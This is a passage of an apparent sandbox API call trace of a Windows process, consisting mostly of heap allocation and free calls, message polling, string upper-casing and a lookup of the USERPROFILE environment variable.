| out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0198.746] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0198.746] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0198.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0198.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0198.747] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0198.747] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0198.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0198.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0198.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0198.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0198.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0198.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0198.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0198.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0198.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0198.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0198.748] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0198.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0198.749] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0198.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0198.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0198.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0198.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0198.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0198.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0198.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0198.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0198.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0198.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0198.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0198.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0198.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0198.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0198.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0198.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0198.752] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0198.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0198.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0198.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0198.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0198.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0198.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0198.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0198.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0198.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0198.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0198.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0198.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0198.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0198.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0198.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0198.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0198.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0198.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0198.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0198.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0198.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0198.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0198.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0198.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0198.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0198.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0198.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0198.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 